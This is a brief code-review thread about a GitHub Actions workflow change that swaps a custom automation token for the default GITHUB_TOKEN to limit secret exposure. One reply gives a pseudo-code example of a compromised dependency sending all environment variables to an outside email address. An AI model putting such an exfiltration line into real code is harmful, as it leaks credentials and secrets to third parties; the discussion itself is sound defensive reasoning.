.github/workflows/cancel.yml

```diff
@@ -14,7 +14,7 @@ jobs:
       - uses: actions/checkout@v3
       - uses: actions/github-script@v6
         with:
-          github-token: ${{ secrets.MLFLOW_AUTOMATION_TOKEN }}
+          github-token: ${{ secrets.GITHUB_TOKEN }}
```

Comment:
I'm not sure if this really works. If it doesn't, I'll revert.

Reply:
What's the security problem of using MLFLOW_AUTOMATION_TOKEN?

Reply:
For example, `.github/workflows/preview-docs.yml` uses `requests`. If one of its dependencies is compromised and contains code like this:

```
send_to(os.environ, "harupy@gmail.com")
```

Reply:
The best way to protect a secret is never use it.